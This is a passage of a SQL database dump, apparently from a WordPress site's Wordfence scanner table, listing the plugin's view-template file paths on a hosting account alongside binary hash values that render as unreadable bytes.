0','wp-content/plugins/wordfence/views/blocking/blocking-create.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/blocking/blocking-create.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BVF\'jno','\rKaTEf','wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(t\r4cR','^Vx_:k (?B!','',0,'?'),('1?oxJ(E','K(wB$\rs줇!ਿD','',0,'?'),('2ģ_Dx ','wp-content/plugins/wordfence/views/common/block-navigation-option.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/block-navigation-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O~}t.K','MNF`\r9ӫrP,Q','',0,'?'),(',@Q','wp-content/plugins/wordfence/views/common/indeterminate-progress.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/indeterminate-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\"sg4\\(8','@Zn\"ξ~QՔ8sP\073','',0,'?'),('BUjv\\ѣ(','wp-content/plugins/wordfence/views/common/license.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':8^r','fB-h^>AnH0\r&','',0,'?'),('llxL,7WN','wp-content/plugins/wordfence/views/common/modal-prompt.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0J.H[|E3$d','\Zz%;onm&','',0,'?'),(']pR/$1','wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+$B`wƕ','a6Οv]z5\rpc','',0,'?'),('x|sKa','wp-content/plugins/wordfence/views/common/page-help.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/page-help.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','! YJJk','\Z=DBא %%A?Ow*/~u','',0,'?'),('ˋ_o!\'ur','wp-content/plugins/wordfence/views/common/page-tabbar.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/page-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qVdЌX@qș','SتAӤ@5|~?KBK9U','',0,'?'),('qqC$@','wp-content/plugins/wordfence/views/common/page-title.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/page-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5*<X;','N5%=kU HVKAlEI\"3j','',0,'?'),('%G]f@%Z','wp-content/plugins/wordfence/views/common/section-subtitle.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/section-subtitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n^\r#fstW\Z',':taQE&͜s١\nGb\\Z S1{','',0,'?'),('%?)','wp-content/plugins/wordfence/views/common/section-title.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!z̥','+ASџbH濳$V+N΂','',0,'?'),('w +j ','wp-content/plugins/wordfence/views/common/status-circular.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/status-circular.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',').=g','q4^\"-9\nd1qO,','',0,'?'),('^O|\':QǙE','wp-content/plugins/wordfence/views/common/status-critical.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/status-critical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R/C[]u%','W B&69gk_EF6I','',0,'?'),('sՌQ7o','wp-content/plugins/wordfence/views/common/status-detail.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/status-detail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`Ufxy99g4','E Fj՗&\nE&J՟gWk.T/','',0,'?'),('#7rY\0i','wp-content/plugins/wordfence/views/common/status-tooltip.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/status-tooltip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FfZ؍PIR&i','EQtY=j.#e W㈤A3QcPT','',0,'?'),('Dd.P˴{-yog','wp-content/plugins/wordfence/views/common/status-warning.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/status-warning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kRf,Jk','f!\rWe=?KjP&*y|','',0,'?'),('p̓02@PFtk','wp-content/plugins/wordfence/views/common/unsubscribe.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/common/unsubscribe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y:h3 >a ݑ4~','EqTgO>F-O(IƚZz','',0,'?'),('Mx1NjTmR_2o','wp-content/plugins/wordfence/views/dashboard/global-status.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/global-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˫\'m`0>+#','pPv?ZFQQcj','',0,'?'),('{[/ڑ','wp-content/plugins/wordfence/views/dashboard/option-howgetips.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/option-howgetips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܎h(v1','\Zleknj\'=|C,\0MlDG','',0,'?'),('bE4t=','wp-content/plugins/wordfence/views/dashboard/options-group-alert.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/options-group-alert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̻owG>p','I`I^{PנhQe:sG^8sĚ','',0,'?'),('~Ⱦ/mր!','wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sX][sC>Q','>_c\ZJ+aUmv)lg','',0,'?'),('̋qB3aY-','wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0`\'}(bA#','c,B p280j7}hp-宆','',0,'?'),('Q.ì\\XeOI','wp-content/plugins/wordfence/views/dashboard/options-group-general.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(t*-6ـX','mVdhI∂dTK{z\Z','',0,'?'),(',M;v','wp-content/plugins/wordfence/views/dashboard/options-group-import.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/options-group-import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JuK.5?g','4mdDX<\"y1U8$p','',0,'?'),(' 5rDg籃','wp-content/plugins/wordfence/views/dashboard/options-group-license.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/options-group-license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')卞U፽','=e:z)z:]:ͼ@{\0','',0,'?'),(']oMseJ4','wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oh5\rxܖN',' 6y\Zuυ; 0~rs1J9XJ','',0,'?'),('PM˝=U','wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʿm\\m10f*)',' mY_\\\'.]WyW00','',0,'?'),('7\0tt.','wp-content/plugins/wordfence/views/dashboard/status-renewing.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/dashboard/status-renewing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hwBe (','^K$1\0nƄ&iM{$^h','',0,'?'),('YBt\n\ncݟ.vi','wp-content/plugins/wordfence/views/diagnostics/text.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/diagnostics/text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yYN','X`ɑuv5/8͚','',0,'?'),('OSYWz!8ʣj','wp-content/plugins/wordfence/views/gdpr/banner.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/gdpr/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>69!Gz>S','ZQa̿|꣞`!C2CK%#l','',0,'?'),('QcmuX\Z3B+X','wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$mR_`W6\0','s)W?PӎB*?xBZd ɗeZٞ{','',0,'?'),('[(WcG','wp-content/plugins/wordfence/views/offboarding/deactivation-prompt.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/offboarding/deactivation-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XWbK8i','.775OnmgLI/we','',0,'?'),('B!vݡɶ','wp-content/plugins/wordfence/views/onboarding/banner.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/onboarding/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']byc~Kw','\ZTDi.qsն B`-pnN','',0,'?'),('mהF@$~r','wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+#\"bMBLK[6','Sk!,BO# Qdz{w-z','',0,'?'),('/7ñcxpg','wp-content/plugins/wordfence/views/onboarding/fresh-install.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/onboarding/fresh-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?-VfO,`0',':!:iD7Bisw4>=Yn_','',0,'?'),(';%N!9\nL&N','wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9f\"& 8','Ja ^e5)zQ؂#l24<','',0,'?'),('3,cvk','wp-content/plugins/wordfence/views/onboarding/overlay.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/onboarding/overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','М s','a:FVW5W, \0~th','wp-content/plugins/wordfence/views/onboarding/registration-prompt.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/onboarding/registration-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fn),n{Y|',',o\\\"E+R\\<gi\ruu<F','',0,'?'),('.麉D0uL-c','wp-content/plugins/wordfence/views/options/option-toggled-segmented.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' BW##','^<4e,\0l\r!d','',0,'?'),(' $%#_U_d','wp-content/plugins/wordfence/views/options/option-toggled-select.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' |Cw@m','5ã\0ӊVbAŇ.Z;Mzq]','',0,'?'),('\rzDD','wp-content/plugins/wordfence/views/options/option-toggled-sub.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m_','RȆF\nD~H08),:llWn\rc','',0,'?'),('DT[-U','wp-content/plugins/wordfence/views/options/option-toggled-textarea.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=q(tݣ˻','atÁ}(0oß%3pu~ĥ','',0,'?'),('* ą\\','wp-content/plugins/wordfence/views/options/option-toggled.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Du\nLE','L8M0=Ykb|59b+z:4','',0,'?'),('7ڔ!2x%XN3','wp-content/plugins/wordfence/views/options/option-token.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xEJR`5\ZC\n','_NRϦgNr{oXӮ','',0,'?'),('몳@ = y`','wp-content/plugins/wordfence/views/options/options-title.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/options/options-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۘj 玓݆E','Kxf+eǖ٭ʌm','',0,'?'),('T??:q׮Pah\'','wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ANX[`h\0 ','\"xIB6E? i\'265y/','',0,'?'),('Nd#R+r\0s[','wp-content/plugins/wordfence/views/reports/activity-report.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/reports/activity-report.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?uewD:E','ζ \Z)vvG,h/ӈ','',0,'?'),('p{\r %>/Z:','wp-content/plugins/wordfence/views/scanner/issue-base.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8ϼg v5aS*',' N.0-?s?,ߟ`.B','',0,'?'),('ܑKݓ%eP^U','wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g}hk9yb(W','\ZDQ^\\9;7vF','',0,'?'),('%|ݽ>?v{j','wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V=l 2X','״0M\"r,_Ǝ>)Gwg?','',0,'?'),('ep\r}u_4','wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Щ3^7DPk@c_l','eנc10F^bBQ@Bu','',0,'?'),('Du\r‹ɲ\Z','wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aի Lqw ','r_iQ aR+','',0,'?'),('cG(`E','wp-content/plugins/wordfence/views/scanner/issue-configReadable.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-configReadable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r\0lp_р>#','T,}1waY4BI]wAX۵','',0,'?'),('$|c \\~','wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\^>5paW>',' DCXG4WFP#NS\Z','',0,'?'),('SHLenPq7č','wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f`j|y','iOGiF| 48Vj\n#V-L','',0,'?'),('ΦHc^)','wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'{=ͺ','R_fW{*3ݔ \"/','',0,'?'),('(dwI\0:\rXx1DC','wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v[A.F3D','@ړVC+@p','\0{aq(w!Iz}+lx/I09|1%','',0,'?'),(')6#_̟SAF','wp-content/plugins/wordfence/views/scanner/issue-control-repair.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-control-repair.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9gs `V','j(ؠ\r 緪U+.d','',0,'?'),('u78¸KԊkh ','wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tJֶDܒ+C','\"uugI$ED=\nQg-TZ','',0,'?'),('eXnj.\\(&d','wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a4P^/7E','ѧ\n7YGĢj*D_.~Cb','',0,'?'),('/0)\Z','wp-content/plugins/wordfence/views/scanner/issue-database.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-database.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S>ZG','\n#Pw3Id}͇%JjU+','',0,'?'),('Xɘy_7XN/','wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\h\'\n䷺',' 7RG$/-iNm(W;̅','',0,'?'),('4\n m]ĿЊ','wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!{\\ d`','ǿ\'ɜLҪB> &-{','',0,'?'),('VtS-','wp-content/plugins/wordfence/views/scanner/issue-file.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xJZ','*ҟb\\kpBS3*','',0,'?'),(';fJ1˘+C','wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n\n+ծ.jqAZ','\0I36ěnj7jk:','',0,'?'),('BQaU%','wp-content/plugins/wordfence/views/scanner/issue-knownfile.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-knownfile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RՅ-e_','3?[6_\\a3sV','',0,'?'),('d0ٷ\ZԌn','wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 0״KW@MRQQ','',0,'?'),('=F혣ÆK&','wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3|xwJ uTV',' i,0@hz<RQwKdh\"','',0,'?'),(',\r gH6','wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8v\ne=\r+','o!#0`Bڡ`Rݖ&##TF','',0,'?'),(';NQ>','wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v@ޗ֙8:(','Dkf}{g%y=3Vfh)nqTx','',0,'?'),('rJ

Z','wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o\\2b,R','ʦw;2g/ o(@\Zﵫ>ؽs;','',0,'?'),('|T]:Y$=\'h ','wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*B> Crg','h$V<`X),㍬᫑I\nDX,y؞','',0,'?'),('ZdkLşT','wp-content/plugins/wordfence/views/scanner/issue-wfUpgradeError.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-wfUpgradeError.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t5<7^Anr','k+QȺF4/rijXj5','',0,'?'),('L.dDv','wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',&1{\04H,','+=ɱ[2ȩ~VXvBӾuK$ް9|]E\r','',0,'?'),('zh9ꈦXp+','wp-content/plugins/wordfence/views/scanner/no-issues.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/no-issues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xt-|Fe','_?7c:_@EJs[','',0,'?'),('C.yj\0o*f','wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L\Z3`fі{_zq',' .IETأJ#JUk7hy\\0','',0,'?'),('sAsYD]','wp-content/plugins/wordfence/views/scanner/options-group-advanced.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/options-group-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' (_0tKG`C','&ITaw0^}uT:]FvB+','',0,'?'),('e}0wTnv_g~','wp-content/plugins/wordfence/views/scanner/options-group-basic.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/options-group-basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VEgO`#jV4C|','sc ;*r3$ XG8ͬRK','',0,'?'),('NTZto\r%F','wp-content/plugins/wordfence/views/scanner/options-group-general.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tLGa\0oҠbY','26ln\r\" c:ƅzvJ1ܶ','',0,'?'),(' ń1r}mJGWR','wp-content/plugins/wordfence/views/scanner/options-group-performance.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/options-group-performance.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P=PҤ ','-9\0tD\\69s]\\e\0Rr','',0,'?'),('lxy\Z\"','wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EU.7H>i;',',+x> V7rLKs&G','',0,'?'),('<3v&F','wp-content/plugins/wordfence/views/scanner/scan-failed.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/scan-failed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}\\fD|2u','3C&i8ʍ9MgoApzo@','',0,'?'),('հ ̋ȲS','wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(`]Vţ[^3','Fܑ t =Y+Yҁe۾Kb6W','',0,'?'),('|]D\Z.E','wp-content/plugins/wordfence/views/scanner/scan-progress-element.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/scan-progress-element.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dꫯy5pc','0(5D=UԔ~ڈI\")7h','',0,'?'),('pխ^@#Ԓ','wp-content/plugins/wordfence/views/scanner/scan-progress.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/scan-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b1{ @m90','KM$)+SCQF1qZTv`r ','',0,'?'),('\'_iYm1R','wp-content/plugins/wordfence/views/scanner/scan-results.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/scan-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qxM!\nB+=L',';Oҥv̉ \n','',0,'?'),('4$ꎪ','wp-content/plugins/wordfence/views/scanner/scan-scheduling.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/scan-scheduling.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&JH Nԑ','rh,ИQU2 VJ6}N\'3iuK','',0,'?'),('F_qCF!o4p','wp-content/plugins/wordfence/views/scanner/scan-starter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/scan-starter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1xh3\\','U~AVkr%Rx$pZ1\"U','',0,'?'),('D! VD+','wp-content/plugins/wordfence/views/scanner/scan-type.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/scan-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NV 9J','փhbf#ЂOER9H\r','',0,'?'),('KKOfSdiB0Ov','wp-content/plugins/wordfence/views/scanner/scanner-status.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/scanner-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 2vt','9`N>ɞ9:A\0L','',0,'?'),('9~\0{@','wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','®uM','JEzٙ6)P)\0','',0,'?'),('&#pJh','wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Čd㈳ec¯f4s78#G`x0','',0,'?'),('V#7A@?)','wp-content/plugins/wordfence/views/unsupported-php/admin-message.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/unsupported-php/admin-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A HRQ~','jZ=8<Oc-R=s.)4ƃ','',0,'?'),(';:\nad_X[F','',0,'?'),('[Ӄ2W','wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')Va6nE.c','0eÊpiva\Zoy-[>|*','',0,'?'),('K< 